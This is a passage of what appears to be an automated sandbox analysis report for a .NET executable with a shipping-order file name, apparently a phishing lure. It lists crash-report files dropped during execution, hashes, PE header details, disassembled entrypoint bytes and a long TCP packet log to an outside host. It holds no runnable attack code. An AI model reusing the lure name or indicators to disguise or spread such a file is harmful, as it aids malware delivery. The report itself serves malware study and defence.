                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8896
                                                            Entropy (8bit):3.7046091041623677
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwGLu6Y9n9QgmfZBWpru89boc1Jgf/4m:R6lXJ5C6YN9QgmfPsokJgfV
                                                            MD5:ED6A5D48DAE2855AEA111827C263CDDE
                                                            SHA1:6B743F2276368CA85939A2C19B5D9172BE3B8170
                                                            SHA-256:25A1403A93CA609EF4378A1FA7753A72BF23D8E05AA7B93EE3F1D810AB70EEEF
                                                            SHA-512:6691C6B24C83667B55FA278FD35B34B1593C3BAA6E997DC2407D0BFF3CF8AEB34824EEEA4AAE6D2E86445AB22A9D6C6CCAC74579D04E93613044742CD049D6D0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.2.4.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER18A9.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4816
                                                            Entropy (8bit):4.494690700781559
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsDJg771I9yNWpW8VYdYm8M4JVrGSYL96FXyq8vwGSYL99kWCjTCyd:uIjfdI7N87VVJBopYWwop9k5iyd
                                                            MD5:0A8397FB9153C8EF798483142539B668
                                                            SHA1:5304EF6DEE02731E221A483FEF618DA99BDFD9AE
                                                            SHA-256:AAB389EDE4CF7C9E35168BFF70DF1460F5A0F42E21C685D28EDBDCCC0DF609B1
                                                            SHA-512:A37F85F5EEB53091094F59A9C6CD37A6145E634757B68C6FFF2839CBF1B2B8ACCF5220C3AFEFD1BE69035B249FA544C29B86F5F9CC15F931236935860C6D528C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="287750" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.465722882160903
                                                            Encrypted:false
                                                            SSDEEP:6144:yIXfpi67eLPU9skLmb0b4aWSPKaJG8nAgejZMMhA2gX4WABl0uN4dwBCswSb+:3XD94aWlLZMM6YFHu++
                                                            MD5:47B03DF1C4873FDF5BE5FB68E471493D
                                                            SHA1:C140748AEB50BD8505EC1D4BDD1F7FCEAA1AA983
                                                            SHA-256:BED759661AF55E9E5C6FF3439598E5E3C4F751B3FE7D189DB75292BFC97B3353
                                                            SHA-512:0BE734BE1427495C8194188EE875B52E98FDE135BF4919322AF576C8E1F605CAF0E0E0E063F6E37B7502398D10DE354B5774279CCB2E380D877110FB3F529CD5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Q..................................................................................................................................................................................................................................................................................................................................................Y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.932304734057946
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:ShippingOrder_ GSHS2400052.exe
                                                            File size:189'952 bytes
                                                            MD5:5a9bf748b2b3431b39e5a8fea6feaa80
                                                            SHA1:08a558eb27295a8e3f70a7a05cf958e2907fd970
                                                            SHA256:3801a5a9dd369ed4fefc953437c2059d00da7b98fabd3ec68262ef48f9718bcf
                                                            SHA512:caa42a2ea17c2ca98812478dd5739479be6fee0c243401c08003092749b1848b4090b7470f9f6641219b9696cccfecebfc2497e2d7fc8200fb833a13bbe0e022
                                                            SSDEEP:3072:fcGYpXxZwveS8lH9YYLI42pVWse3Ns6G2FxgiNCJmPG04:EGYpvwveMYpBRFxgvh
                                                            TLSH:7B045B18EF88C622DA5E173260A343008FB8D1D7A647EBCBEC5468F82C537495E556BF
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.!f............................R.... ... ....@.. .......................@............@................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x430152
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6621C524 [Fri Apr 19 01:13:08 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00430160h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor al, 01h
                                                            add eax, dword ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            and al, C5h
                                                            and dword ptr [esi+00h], esp
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx+00h], cl
                                                            add byte ptr [eax], al
                                                            test byte ptr [ecx], al
                                                            add eax, dword ptr [eax]
                                                            test bl, ah
                                                            add al, byte ptr [eax]
                                                            push edx
                                                            push ebx
                                                            inc esp
                                                            push ebx
                                                            mov edi, 6E45C05Fh
                                                            cwde
                                                            pop eax
                                                            dec edi
                                                            wait
                                                            dec eax
                                                            push esi
                                                            jne 00007F0BE09190D6h
                                                            scasb
                                                            cld
                                                            add dword ptr [ecx], 00000000h
                                                            add byte ptr [eax], al
                                                            inc ebx
                                                            cmp bl, byte ptr [ebp+edx*2+73h]
                                                            jc 00007F0BE0919186h
                                                            pop esp
                                                            arpl word ptr [edi+6Dh], bp
                                                            jo 00007F0BE0919187h
                                                            je 00007F0BE0919177h
                                                            jc 00007F0BE091916Eh
                                                            inc esp
                                                            jnc 00007F0BE091917Eh
                                                            je 00007F0BE0919181h
                                                            jo 00007F0BE091916Eh
                                                            dec edi
                                                            jne 00007F0BE0919186h
                                                            jo 00007F0BE0919187h
                                                            je 00007F0BE0919185h
                                                            pop esp
                                                            inc ebp
                                                            insd
                                                            jnc 00007F0BE0919174h
                                                            outsb
                                                            arpl word ptr [edi+4Eh], bp
                                                            insb
                                                            jo 00007F0BE0919177h
                                                            bound eax, dword ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x301040x4c.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x301680x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x301600x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x2e1cd0x2e2001383d7dab6f6cf9df4e3e11bca2cc24eFalse0.4144594766260163data5.949353241730458IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .reloc0x320000xc0x200d2cbb0866d64f2d9e2039a63bad76cfeFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 20, 2024 06:47:51.566257954 CEST49675443192.168.2.4173.222.162.32
                                                            Apr 20, 2024 06:47:55.445805073 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:55.445883989 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:55.446192980 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:55.465955973 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:55.466034889 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:55.893446922 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:55.893585920 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:55.915636063 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:55.915715933 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:55.916723967 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:55.972569942 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.022039890 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.064172983 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505055904 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505129099 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505150080 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505167961 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505204916 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505223036 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505341053 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505342007 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505342007 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505342007 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505410910 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505450964 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505476952 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505481005 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505498886 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505506992 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505552053 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505559921 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.505631924 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.505650997 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.550720930 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.707701921 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.707739115 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.707935095 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.707983971 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708004951 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708022118 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708122969 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.708123922 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.708123922 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.708123922 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.708193064 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708230019 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708282948 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708292961 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.708317041 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.708360910 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.753824949 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.910501957 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.910552025 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.910772085 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.910772085 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.910793066 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.910820007 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.910865068 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.910895109 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.910896063 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.910963058 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911011934 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911036015 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911129951 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911170006 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911201954 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911216974 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911247015 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911276102 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911470890 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911510944 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911544085 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911560059 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911587000 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911612034 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911807060 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911845922 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911884069 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911896944 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.911925077 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.911951065 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.912153959 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.912194014 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.912228107 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.912240982 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.912270069 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.912296057 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.942600965 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.942645073 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.942856073 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.942856073 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:56.942918062 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:56.942980051 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.116858006 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.116903067 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117077112 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117077112 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117106915 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117135048 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117180109 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117202997 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117202997 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117252111 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117290974 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117314100 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117461920 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117501974 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117537022 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117552042 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117594004 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117641926 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117767096 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117806911 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117842913 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117855072 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.117882967 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.117908955 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118058920 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118100882 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118136883 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118149996 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118175983 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118201017 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118417978 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118455887 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118495941 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118509054 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118535042 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118558884 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118683100 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118721962 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118760109 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118772030 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.118798018 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118823051 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.118989944 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119030952 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119067907 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119081020 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119107962 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119127989 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119287014 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119327068 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119364977 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119376898 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119404078 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119432926 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119482994 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119522095 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119555950 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119566917 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119594097 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119613886 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119767904 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119807959 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119844913 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119857073 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.119888067 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.119924068 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.348717928 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.348767996 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.348895073 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.348913908 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.348913908 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.348983049 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349056959 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349061012 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349081039 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349088907 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349112034 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349123955 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349158049 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349251986 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349298954 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349421024 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349458933 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349525928 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349525928 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349525928 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349525928 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349592924 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349632978 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349649906 CEST49730443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:57.349668026 CEST44349730193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:57.349699974 CEST49730443192.168.2.4193.222.96.147
